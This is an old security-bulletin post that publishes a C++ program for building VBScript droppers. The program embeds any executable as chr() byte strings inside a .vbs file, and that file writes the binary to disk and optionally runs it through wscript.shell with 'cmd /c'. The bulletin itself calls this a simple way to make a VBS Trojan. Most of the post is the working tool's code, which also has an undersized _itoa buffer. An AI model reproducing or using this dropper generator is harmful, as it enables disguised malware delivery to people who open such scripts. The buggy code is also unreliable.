Exe in VB Script


20 Feb 2001 

Subject: [TOOL] Encapsulation EXE in a VB Script (creation tool)

  Encapsulation EXE in a VB Script (creation tool)
------------------------------------------------------------------------


DETAILS

The following tool creates VBS files that will create an on-the-fly EXE 
file and execute it once the script runs.

This doesn't pose a new security threat, nor does it present any new 
vulnerability. However, it shows how simple it is to create a VBS Trojan 
that can compromise the system's security without being limited to VB 
Script commands.

Tool:
//code by dorian [email protected]
//This will create a VBS file with the ability to create an executable
//By using this windows program, you can store an executable inside of a
//Visual Basic Script. When this script is executed, it will create an 
exact copy
//of an executable and execute it. So you store the binary characters into 
a vbs file
//You can also edit the vbs file or whatever. This is a simple program, 
but I thought
//it could be useful.
//Keep your exe files small for this to work well. Also, I compiled this 
with MS dev studio
#include 
#include 
#include 

using namespace std;

int main()
{
  
  FILE *fp,*wf;
  char exe[80];
  char vbsfile[80];
  char buffer[2];
  char execut;
  cout << "Please enter exe to copy from: ";
  cin  >> exe;
  cout << endl << "Please enter output vbs file: ";
  cin  >> vbsfile;
  cout << endl << "Execute after clicked in VB script y/n :";
  cin  >> execut;
  fp = fopen(exe, "rb");
  wf = fopen(vbsfile, "wb");
  cout << "Processing...";
  
  // Write first stuff
  
	 fprintf(wf," dim filesys, filetxt, getname, path, textfile, i \n");
   fprintf(wf,"textfile = \"vbsexecutemaker.exe\" \n");
   fprintf(wf,"Set filesys = CreateObject(\"Scripting.FileSystemObject\") 
\n");
   fprintf(wf, "Set filetxt = filesys.CreateTextFile(textfile, True) \n" 
);
   fprintf(wf, "getname = filesys.GetFileName(path) \n"  ); 
   fprintf(wf,"filetxt.Write("); 
   // Get ascii values for the chars
   fprintf(wf,"chr(" );
   fprintf(wf,_itoa( getc(fp), buffer,10) );
   fprintf(wf,") ");
   
   while(!feof(fp))
   {
     int c = getc(fp);
     
     if(!feof(fp))
     {
       fprintf(wf, "& ");	
       fprintf(wf,"chr(" );
       fprintf(wf,_itoa( c, buffer,10) );
       fprintf(wf,") ");
     }
     
   }	
   fprintf(wf, ") \n");
   fprintf(wf, "filetxt.Close");
   
   if(execut == 'y')
   {
     fprintf(wf,"\n dim joe \n");
     fprintf(wf," dim mine \n");
     fprintf(wf,"Const ForReading = 1, ForWriting = 2, ForAppending = 3\n 
");
     fprintf(wf,"const RemoteExe = \"vbsexecutemaker.exe\" \n" );
     fprintf(wf,"set mine = wscript.createobject(\"wscript.shell\") \n");
     fprintf(wf,"joe = mine.run (\"cmd /c vbsexecutemaker.exe\") \n");
     fprintf(wf,"wscript.quit \n ");
   }
   cout << endl << "Done." << endl;
   //Close files after opening
   fclose(fp);
   fclose(wf);
   
   return 0;
}



======================================== 


DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.